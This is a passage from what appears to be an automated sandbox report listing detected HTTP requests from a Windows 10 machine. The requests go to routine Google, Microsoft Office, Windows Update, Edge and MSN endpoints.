              Source: global trafficHTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCI/KzQEIucrNAQi/0c0BCIrTzQEI0NbNAQio2M0BCPnA1BUYj87NARi60s0BGMLYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=Ts2XnfxeuFhKo77&MD=WfzzbFec HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
              Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
              Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1Host: api.edgeoffer.microsoft.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
              Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /crx/blobs/AW50ZFsLPhJJyx_4ShcDOgcEpJeOc7Vr0kMzfFRoaMfWx4pAgZ0UGF2i9_ei1A7FAHQ-EPFULeBn7F8_SEKhjbpEyKfiidX7GF_6BDOycMeg5w03wjwVQ61hkaEix8WFqmEAxlKa5cmz_tdFr9JtRwdqRu82wmLe2Ghe/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_84_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
              Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: EntityExtractionDomainsConfigSec-Mesh-Client-Edge-Version: 117.0.2045.47Sec-Mesh-Client-Edge-Channel: stableSec-Mesh-Client-OS: WindowsSec-Mesh-Client-OS-Version: 10.0.19045Sec-Mesh-Client-Arch: x86_64Sec-Mesh-Client-WebView: 0Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
              Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Shoreline HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: ShorelineSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
              Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /b?rn=1732146580940&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=02AF36CE75CE647F00F523F374AC6592&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
              Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
              Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
              Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
              Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
              Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
              Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_M365_light.png/1.7.32/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
              Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /v4/api/selection?nct=1&fmt=json&nocookie=0&locale=en-us&country=US&muid=02AF36CE75CE647F00F523F374AC6592&ACHANNEL=4&ABUILD=117.0.5938.132&clr=esdk&edgeid=6686581979505309747&ADEFAB=1&devosver=10.0.19045.2006&OPSYS=WIN10&poptin=0&UITHEME=light&pageConfig=547&ISSIGNEDIN=0&MSN_CANVAS=2&ISMOBILE=0&BROWSER=6&placement=88000308|10837393&bcnt=1|1&asid=1652c46db0e14d0bf0a8e7c235a9b313 HTTP/1.1Host: arc.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=02AF36CE75CE647F00F523F374AC6592; _EDGE_S=F=1&SID=14C32D7CE61E6B5920983841E71A6A76; _EDGE_V=1
              Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/AA13Q6AL.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
              Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/AAc9vHK.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
              Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/BB1lFz6G.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
              Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/AA1hk7Sh.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
              Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/AA1u24yb.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
              Source: global trafficHTTP traffic detected: GET /b2?rn=1732146580940&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=02AF36CE75CE647F00F523F374AC6592&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=1C70541621bece877abc00a1732146581; XID=1C70541621bece877abc00a1732146581
              Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1732146580940&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=2be22f69e21a49cfaf6226b272c6f5bf&activityId=2be22f69e21a49cfaf6226b272c6f5bf&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=98AF16FA7EF64DBE97659D03ACE375C9&MUID=02AF36CE75CE647F00F523F374AC6592 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=02AF36CE75CE647F00F523F374AC6592; _EDGE_S=F=1&SID=14C32D7CE61E6B5920983841E71A6A76; _EDGE_V=1; SM=T
              Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_outlook_light.png/1.9.10/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
              Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
              Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
